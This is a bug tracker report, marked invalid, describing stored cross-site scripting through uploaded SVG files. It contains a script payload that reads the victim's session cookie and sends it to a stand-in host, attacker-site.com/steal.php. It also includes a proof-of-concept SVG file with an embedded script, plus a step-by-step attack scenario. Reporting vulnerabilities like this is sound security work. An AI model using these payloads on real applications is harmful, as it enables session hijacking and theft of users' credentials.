Details
-
Bug
-
Resolution: Invalid
-
Blocker
-
None
-
17.3.0
-
None
-
Unknown
-
N/A
-
N/A
-
Description
A SVG file uploaded can store XSS
payloads. Any editor, even comments can store XSS. Since SVG files
are just XML files, JS can be stored. A user can copy the link to the
file and send it to another user and have access to their session
cookie in the context of the application.
A realistic attack scenario:
Attacker uploads a SVG with the following payload,
<script> var cookies = document.cookie; var img = new Image(); img.src = "http://attacker-site.com/steal.php?cookies=" + encodeURIComponent(cookies); </script>
The attacker then right clicks on the SVG, to copy the URL to where the SVG is located.
The attacker sends the link to the victim or pastes it into another comment reply.
The victim will see that the URL belongs to the trusted domain and click.
The XSS payload will then be executed in the context of the application.
This saved as xss.svg can be used to replicate the video:
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert('xss'); </script> </svg>
I have attached a video
demoing how to store the payload.
Attachments
Issue Links
- is related to
-
-
- Closed
-